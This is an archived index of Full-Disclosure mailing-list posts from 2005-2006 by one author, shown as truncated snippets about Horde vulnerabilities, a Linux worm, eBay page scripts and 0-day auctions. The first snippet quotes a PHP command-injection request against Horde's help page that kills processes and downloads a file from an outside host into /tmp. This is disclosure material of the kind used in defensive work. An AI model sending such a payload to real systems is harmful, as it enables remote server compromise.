Re: [Full-disclosure] [SECURITY] [DSA 1034-1] New horde2 packages fixseveral vulnerabilities

2006-04-14 Thread Byron Copeland
Here's another attempt: GET /horde//services/help/?show=about&module=;%22 .passthru(%22killall%20-9%20perl;cd%20%22.chr(47).%22tmp;wget%20http:%22.chr(47).%22%22.chr(47). %22dary.6te.net%22.chr(47).%22h;curl%20-O%20h%20http:%22.chr(47).%22%22.chr(47).%22dary.6te.net% 22.chr(47).%22h;fetch%20http:%

Re: [Full-disclosure] update on the linux worm

2006-02-22 Thread Byron Copeland
All, Just wondering, has this dropped off the scope or did the AV vendors find a solution? Or perhaps I missed what that was? Thanks, -n http://www.iatechconsulting.com On Sun, 2006-02-19 at 16:57, Juha-Matti Laurio wrote: > --cllip-- > > To my knowledge: mambo, phpgroupware and wordpress. > >

[Full-disclosure] Occasional random strings

2005-12-16 Thread Byron Copeland
All, When refreshing a listing on eBay (say every 2-3 seconds), these commented javascript strings occasionally show up while using firefox. It appears that this is just the tail end of it all, but none-the-less you can tell it's part of some function. xec("execute","myebay",Localize("My eBay"))

Re: [Full-disclosure] Re: 0-day for sale on ebay - New auction!

2005-12-13 Thread Byron Copeland
On Mon, 2005-12-12 at 17:45, [EMAIL PROTECTED] wrote: > It looks like the same person opened another auction: > > http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=6588680836 Actually, it is now de-listed :) ___ Full-Disclosure - We believe in it.

Re: [Full-disclosure] McAfee VirusScan vs Metasploit Framework v2.x

2005-12-09 Thread Byron Copeland
I agree you can't reproduce the "entire" internet. But in a training environment, you do have options as these folks have already proven. www.virtualondemand.com On Fri, 2005-12-09 at 16:18, Dude VanWinkle wrote: > On 12/9/05, Michael Holstein <[EMAIL PROTECTED]> wrote: > > Because I'll catch th

[Full-disclosure] PowerTerm

2005-12-09 Thread Byron Copeland
Source code is up on eBay. http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem&item=8735835502 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Asshat coders

2005-03-23 Thread Byron Copeland
gt; Charter: http://lists.grok.org.uk/full-disclosure-charter.html > >> Hosted and sponsored by Secunia - http://secunia.com/ > >> > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: http://lists.